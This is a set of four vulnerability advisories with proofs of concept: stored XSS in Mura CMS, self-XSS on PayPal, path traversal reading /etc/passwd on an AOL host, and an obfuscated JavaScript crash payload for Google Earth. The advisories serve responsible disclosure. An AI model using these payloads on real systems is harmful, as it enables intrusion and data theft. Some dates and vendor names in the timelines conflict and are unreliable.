Advisories 2017

2017-001: BlueRiver Mura CMS vulnerable to Stored Cross Site Scripting Attacks via rb parameter.
2017-002: Paypal(dot)com self-XSS Vulnerability
2017-003: My AOL | Today's News vulnerable to Path Traversal
2017-010: Google Earth 'QtWebKit4' NULL Pointer Dereference Vulnerability

2017-001: BlueRiver Mura CMS vulnerable to Stored Cross Site Scripting Attacks via rb parameter.

Original release date: 30, 05 2017
Last revised: May 30, 2017
Discovered by: José Carlos Expósito Bueno
Severity: 7.5 CVSSv2/AV:N/AC:L/AU:N/C:P/I:P/A:P

BACKGROUND

Mura CMS is an open source content management system for CFML, created by Blue River Interactive Group.
Mura has been designed to be used by marketing departments, web designers and developers and it's widely used by important companies and organizations around the world like NATO, NASA, GSA, European Commision, Intel, P&G, USA FDA, USA Social Security Administration, USA Senate, USA Navy, USA Dept of Health and Human Services, USA Dept. of Homeland, Schneider, First Hawaian Bank, Boeing, Baylor College of Medicine and Michigan State University.

DESCRIPTION

BlueRiver Mura CMS is vulnerable to Stored Cross Site Scripting Attacks via rb parameter.
The Stored Cross Site Scripting is executed every time a user visit Mura CMS Administration Login Page.

PROOF OF CONCEPT

                   ########################################
### Stored XSS Request
########################################
GET /path/admin/index.cfm?rb=x%27;alert(document.domain);// HTTP/1.1
Host: vulnerable.host.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: s_vi=[CS]v1|2C5FE38B85311092-6000010DC0007122[CE]; AMCV_9E1005A551ED61CA0A490D45%40AdobeOrg=1099438348%7CMCAID%7C2C5FE38B85311092-6000010DC0007122%7CMCIDTS%7C17313%7CMCMID%7C85409179856262413853165277697928813021%7CMCAAMLH-1496404669%7C6%7CMCAAMB-1496404669%7CNRX38WO0n5BH8Th-nqAG_A%7CMCOPTOUT-1495807069s%7CNONE%7CMCSYNCSOP%7C411-17320%7CvVersion%7C2.1.0; s_pers=%20cpn%3D%7C1653566268691%3B%20ppn%3Dadobe.com%7C1653566268694%3B%20s_amov%3D1%7C1495801669949%3B%20s_fid%3D372E39AA61EA3FA1-198193CA03B92617%7C1559063139263%3B%20s_vs%3D1%7C1495992939272%3B%20gpv%3Dcoldfusion.adobe.com%253Acoldfusion%253Aindex.cfm%253Ablog%7C1495992939278%3B%20s_nr%3D1495991139283-Repeat%7C1527527139283%3B; mbox=session#8092c2d4c21445d6809d0ebd62c80c34#1495801734|PC#8092c2d4c21445d6809d0ebd62c80c34.26_15#1559044671; georouting_presented=true; __CT_Data=gpv=1&apv_100_www20=1&cpv_100_www20=1&rpv_100_www20=1; aam_uuid=85612095538239441673145124797129108819; WRUIDAWS=1240751761843931; CFID=456409; CFTOKEN=e412f04e7813ca1-4149DA5A-5056-A56D-8CE03E8CA1EFA11D; ORIGINALURLTOKEN=9FFF7F6A%2D70C2%2D421D%2DA2013073200D197F; MOBILEFORMAT=false; rb=""; sfdc_session=-; s_sess=%20s_cc%3Dtrue%3B%20s_cpc%3D0%3B%20s_sq%3D%3B%20s_ppv%3D-%252C29%252C29%252C671%3B; aam_uuid=85612095538239441673145124797129108819; s_fid=6DEA32486AB53A9B-168353046F737537; s_cc=true
Connection: close
Upgrade-Insecure-Requests: 1

########################################
### Response and Redirect to Stored XSS
########################################
HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Location: ./?muraAction=clogin.main
Server: Microsoft-IIS/8.0
Generator: Mura CMS
X-Powered-By: ASP.NET
Date: Mon, 29 May 2017 08:31:36 GMT
Connection: close
Content-Length: 0

########################################
### Redirect Request
########################################
GET /path/admin/?muraAction=clogin.main HTTP/1.1
Host: vulnerable.host.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: s_vi=[CS]v1|2C5FE38B85311092-6000010DC0007122[CE]; AMCV_9E1005A551ED61CA0A490D45%40AdobeOrg=1099438348%7CMCAID%7C2C5FE38B85311092-6000010DC0007122%7CMCIDTS%7C17313%7CMCMID%7C85409179856262413853165277697928813021%7CMCAAMLH-1496404669%7C6%7CMCAAMB-1496404669%7CNRX38WO0n5BH8Th-nqAG_A%7CMCOPTOUT-1495807069s%7CNONE%7CMCSYNCSOP%7C411-17320%7CvVersion%7C2.1.0; s_pers=%20cpn%3D%7C1653566268691%3B%20ppn%3Dadobe.com%7C1653566268694%3B%20s_amov%3D1%7C1495801669949%3B%20s_fid%3D372E39AA61EA3FA1-198193CA03B92617%7C1559063139263%3B%20s_vs%3D1%7C1495992939272%3B%20gpv%3Dcoldfusion.adobe.com%253Acoldfusion%253Aindex.cfm%253Ablog%7C1495992939278%3B%20s_nr%3D1495991139283-Repeat%7C1527527139283%3B; mbox=session#8092c2d4c21445d6809d0ebd62c80c34#1495801734|PC#8092c2d4c21445d6809d0ebd62c80c34.26_15#1559044671; georouting_presented=true; __CT_Data=gpv=1&apv_100_www20=1&cpv_100_www20=1&rpv_100_www20=1; aam_uuid=85612095538239441673145124797129108819; WRUIDAWS=1240751761843931; CFID=456409; CFTOKEN=e412f04e7813ca1-4149DA5A-5056-A56D-8CE03E8CA1EFA11D; ORIGINALURLTOKEN=9FFF7F6A%2D70C2%2D421D%2DA2013073200D197F; MOBILEFORMAT=false; rb=""; sfdc_session=-; s_sess=%20s_cc%3Dtrue%3B%20s_cpc%3D0%3B%20s_sq%3D%3B%20s_ppv%3D-%252C29%252C29%252C671%3B; aam_uuid=85612095538239441673145124797129108819; s_fid=6DEA32486AB53A9B-168353046F737537; s_cc=true
Connection: close
Upgrade-Insecure-Requests: 1


########################################
### Redirect Response with Stored XSS
########################################
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Expires: 06 Nov 1994 08:37:34 GMT
Server: Microsoft-IIS/8.0
Generator: Mura CMS
X-Powered-By: ASP.NET
Date: Mon, 29 May 2017 08:31:46 GMT
Connection: close

<!DOCTYPE html>
[...SNIP...]
<!-- Mura Vars -->
<script type="text/javascript">
var htmlEditorType='';
var context='/path';
var themepath='/path/default/includes/themes/CleanCanvasWrap';
var rb='x';alert(document.domain);//';
var siteid='default';
var sessionTimeout=10800;
var activepanel=0;
var activetab=0;
var webroot='C:\\inetpub\\wwwroot';
var fileDelim='\\';
</script>
[...SNIP...]

BUSINESS IMPACT

An attacker can execute arbitrary HTML or script code in a targeted user's browser, this can leverage to steal sensitive information as user credentials, personal data, etc.

SYSTEMS AFFECTED

This vulnerability was verified in BlueRiver Mura CMS 6.1 running under Adobe ColdFusion.

SOLUTION

Contact vendor for a fix.

REFERENCES

Consult these external references for further information:

  • BlueRiver | Mura

   http://www.getmura.com/

  • OWASP | XSS

   https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29

  • CWE | CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

   https://cwe.mitre.org/data/definitions/79.html

CREDITS

This vulnerability has been discovered by José Carlos Expósito Bueno (jcexposito (at) isecauditors (dot) com).

REVISION HISTORY

May 30, 2017: Initial release

DISCLOSURE TIMELINE

May 29, 2017 : Vulnerability acquired by Internet Security Auditors (www.isecauditors.com)
May 30, 2017 : Contact with Google Security Team
June 2, 2017 : Vendor Response/Feedback: this issue has been patched already in the latest 6.1 version

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.

ABOUT

Internet Security Auditors is a Spain based leader in web application testing, network security, penetration testing, security compliance implementation and assessing. Our clients include some of the largest companies in areas such as finance, telecommunications, insurance, ITC, etc. We are vendor independent provider with a deep expertise since 2001. Our efforts in R&D include vulnerability research, open security project collaboration and whitepapers, presentations and security events participation and promotion. For further information regarding our security services, contact us.

2017-002: Paypal(dot)com self-XSS Vulnerability

Original release date: February 25, 2017
Last revised: February 27, 2017
Discovered by: Fabián Cuchietti
Severity: 2/5 (CVSSv3 Base Metrics)

BACKGROUND

PayPal Holdings, Inc. is an American company operating a worldwide online payments system that supports online money transfers and serves as an electronic alternative to traditional paper methods like checks and money orders.

DESCRIPTION

Paypal (dot) com is affected by self Cross-Site Scripting vulnerability in the "Reminder Note". The vulnerable resource does not properly check the type of the parameters passed to the application through POST requests. It allows malicious users to bypass the sanitizer and execute arbitrary HTML/script code in the context of the victim's browser.

PROOF OF CONCEPT

1) Sign in to your paypal account

2) Go to category: Tools > Forms of Payment

3) Click on Create a new payment format

4) Complete the form and click Submit

5) Go to: Manage payment formats > Edit the created payment format >

6) Memo or "Reminder Note" > Edit > Here we insert our payload, i.e: "><img src=x on error=prompt(document.domain)> > Click on Saved

7) The XSS will be executed successfully.

BUSINESS IMPACT

An attacker can execute arbitrary HTML or script code in a targeted user's browser, this can leverage to steal sensitive information as user credentials, personal data, etc.

SYSTEMS AFFECTED

https://www.paypal.com/

SOLUTION

-

REFERENCES

http://www.isecauditors.com
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

CREDITS

This vulnerability has been discovered by Oscar Fabián Cuchietti (ofcuchietti (at) isecauditors (dot) com).

REVISION HISTORY

December 13, 2015 Initial release

DISCLOSURE TIMELINE

February 25, 2017   Vulnerability acquired by Internet Security Auditors (www.isecauditors.com)
February 25, 2017   Contact with Paypal Security Team
February 27, 2017   Vendor Response/Feedback
February 27, 2017   Advisory published.

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.

ABOUT

Internet Security Auditors is a Spain based leader in web application testing, network security, penetration testing, security compliance implementation and assessing. Our clients include some of the largest companies in areas such as finance, telecommunications, insurance, ITC, etc. We are vendor independent provider with a deep expertise since 2001. Our efforts in R&D include vulnerability research, open security project collaboration and whitepapers, presentations and security events participation and promotion. For further information regarding our security services, contact us.

2017-003: My AOL | Today's News vulnerable to Path Traversal

Original release date: June 26, 2017
Last revised: June 26, 2017
Discovered by: Jose Carlos Exposito Bueno
Severity: 7.8 CVSSv2:(AV:N/AC:L/Au:N/C:C/I:N/A:N)

BACKGROUND

AOL Inc. (simply known as AOL, originally known as America Online) is a web portal and online service provider based in New York, a Subsidiary of Verizon Communications, a part of Oath. AOL was one of the early pioneers of the Internet in the mid-1990s, and the most recognized brand on the web in the U.S. It originally provided a dial-up service to millions of Americans, as well as providing a web portal, e-mail, instant messaging and later a web browser following its purchase of Netscape.

DESCRIPTION

"alertswp.aol.com" is vulnerable to path traversal, so anyone can access the file system remotely.

PROOF OF CONCEPT

http://alertswp.aol.com/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

BUSINESS IMPACT

Access files and directories that are stored outside the web root folder. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files.

SYSTEMS AFFECTED

Current "alertswp.aol.com" Portal site.

SOLUTION

-

REFERENCES

https://www.owasp.org/index.php/Path_Traversal

CREDITS

This vulnerability has been discovered by José Carlos Expósito Bueno (jcexposito (at) isecauditors (dot) com).

REVISION HISTORY

June 26, 2017 : Initial release

DISCLOSURE TIMELINE

June 26, 2017 : Vulnerability acquired by Internet Security Auditors (www.isecauditors.com)
June 26, 2017 : Advisory comunicated to AOL security team

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.

ABOUT

Internet Security Auditors is a Spain based leader in web application testing, network security, penetration testing, security compliance implementation and assessing. Our clients include some of the largest companies in areas such as finance, telecommunications, insurance, ITC, etc. We are vendor independent provider with a deep expertise since 2001. Our efforts in R&D include vulnerability research, open security project collaboration and whitepapers, presentations and security events participation and promotion. For further information regarding our security services, contact us.

2017-010: Google Earth 'QtWebKit4' NULL Pointer Dereference Vulnerability

Original release date: January 20, 2016
Last revised: January 20, 2016
Discovered by: Fabián Cuchietti
Severity: 4/5

BACKGROUND

Google Earth is a virtual globe, map and geographical information program that was originally called EarthViewer 3D created by Keyhole, Inc, a Central Intelligence Agency (CIA) funded company acquired by Google in 2004.

DESCRIPTION

NULL pointer dereference erros are common in C/C++ languages. Pointer is a programming language data type that references a location in memory. Once the value of the location is obtained by the pointer, this pointer is considered dereferenced. The NULL pointer dereference weakness occurs where application dereferences a pointer that is expected to be a valid address but instead is equal to NULL.

PROOF OF CONCEPT

1) Open Google Earth

2) My Places

3) Right click> Add> Folder

4) Select a name for your folder

5) Description: Here we insert our payload > OK

{Payload: <script type="text/javascript">
    String.prototype.repeat = function( num )
    {return new Array( num + 1 ).join( this );}
    var i=0;
    var r=Math.floor(Math.random()*99999)*9*8*9*9*9*9*9*9*9/9*9;
    var bib=String.fromCharCode(60, 120, 104, 116, 58, 97, 99, 114,
    111, 110, 121, 109, 32, 115, 116, 121, 108, 101, 61, 34, 102, 111,
    110, 116, 58, 49, 48, 48, 48, 48, 48, 37, 32, 102, 105, 120, 101, 100,
    115, 121, 115, 59, 32, 115, 116, 121, 108, 101, 61, 34, 120, 115, 115,
    58, 101, 120, 112, 114, 101, 115, 115, 105, 111, 110, 40, 97, 108, 101,
    114, 116, 40, 49, 41, 41, 34, 32, 32, 45, 109, 111, 122,
    45, 98)+r+String.fromCharCode(105, 110, 100, 105, 110, 103, 58, 117,
    114, 108, 40, 35, 49, 49, 41, 59, 32, 102, 111, 110, 116, 45, 102, 97,
    109, 105, 108, 121, 58, 102, 105, 120, 101, 100, 115, 121, 115, 59, 34,
    62, 49, 32, 49, 60, 47, 120, 104, 116, 58, 97, 99, 114, 111, 110, 121, 109,
    62, 10);
    document.write(bib.repeat(9999999));
   </script> }
  
6) Click the folder created with the payload



DUMP:

FAULTING_IP:
+89cde
00000000 ??              ???

EXCEPTION_RECORD:  ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 00000000
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000008
   Parameter[1]: 00000000
Attempt to execute non-executable address 00000000

PROCESS_NAME:  googleearth.exe

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at "0x%08lx" referenced memory at "0x%08lx". The memory could not be "%s".

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at "0x%08lx" referenced memory at "0x%08lx". The memory could not be "%s".

EXCEPTION_PARAMETER1:  00000008

EXCEPTION_PARAMETER2:  00000000

WRITE_ADDRESS:  00000000

FOLLOWUP_IP:
QtWebKit4+89cde
5c9f9cde ??              ???

FAILED_INSTRUCTION_ADDRESS:
+89cde
00000000 ??              ???

FAULTING_THREAD:  00001044

BUGCHECK_STR:  APPLICATION_FAULT_SOFTWARE_NX_FAULT_NULL

PRIMARY_PROBLEM_CLASS:  SOFTWARE_NX_FAULT_NULL

DEFAULT_BUCKET_ID:  SOFTWARE_NX_FAULT_NULL

LAST_CONTROL_TRANSFER:  from 5c9f9cde to 00000000

STACK_TEXT: 
WARNING: Frame IP not in any known module. Following frames may be wrong.
002cafb8 5c9f9cde 002cb05c 5c9b74f1 5e9c7916 0x0
002cafbc 002cb05c 5c9b74f1 5e9c7916 00000000 QtWebKit4+0x89cde
002cafc0 5c9b74f1 5e9c7916 00000000 00000000 0x2cb05c
002cb05c 00000000 00000000 00000000 00000000 QtWebKit4+0x474f1


STACK_COMMAND:  ~0s; .ecxr ; kb

SYMBOL_STACK_INDEX:  1

SYMBOL_NAME:  qtwebkit4+89cde

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: QtWebKit4

IMAGE_NAME:  QtWebKit4.dll

DEBUG_FLR_IMAGE_TIMESTAMP:  4e010a08

FAILURE_BUCKET_ID:  SOFTWARE_NX_FAULT_NULL_c0000005_QtWebKit4.dll!Unknown

BUSINESS IMPACT

In most cases, NULL pointer dereference errors result in the crash of application however, remote code execution is possible under certain circumstances. Depending on privileges of the application, this weakness can result in a denial of service attack against the entire system or can be used to gain complete control over it.

SYSTEMS AFFECTED

https://www.google.com/earth/

SOLUTION

-

REFERENCES

http://www.isecauditors.com
https://www.owasp.org/index.php/Null-pointer_dereference
http://cwe.mitre.org/data/definitions/476.html

CREDITS

This vulnerability has been discovered by Oscar Fabián Cuchietti (ofcuchietti (at) isecauditors (dot) com).

REVISION HISTORY

December 13, 2015 Initial release

DISCLOSURE TIMELINE

December 13, 2015   Vulnerability acquired by Internet Security Auditors (www.isecauditors.com)
December 13, 2015   Contact with Google Security Team
December 14, 2015   Vendor Response/Feedback
January  20, 2016   Advisory published.

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.

ABOUT

Internet Security Auditors is a Spain based leader in web application testing, network security, penetration testing, security compliance implementation and assessing. Our clients include some of the largest companies in areas such as finance, telecommunications, insurance, ITC, etc. We are vendor independent provider with a deep expertise since 2001. Our efforts in R&D include vulnerability research, open security project collaboration and whitepapers, presentations and security events participation and promotion. For further information regarding our security services, contact us.